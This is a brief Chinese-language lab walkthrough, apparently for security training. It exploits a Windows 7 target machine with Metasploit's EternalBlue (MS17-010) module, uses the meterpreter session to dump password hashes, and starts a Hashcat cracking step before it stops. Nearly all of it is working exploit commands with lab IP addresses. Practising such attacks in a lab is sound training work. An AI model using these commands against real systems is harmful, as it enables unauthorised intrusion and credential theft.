打开终端启动Metasploit终端
msfconsole
利用ms17-010进行溢出攻击
use exploit/windows/smb/ms17_010_eternalblue
set LHOST 192.168.52.129
set RHOST 192.168.52.135
set RPORT 445
set target 0
run
溢出攻击成功后显示meterpreter提示符:
获取靶机windows7账户密码的Hash值:
hashdump
2. 利用Hashcat对user账户的密码Hash进行暴力破解:
(1)退回到终端:
exit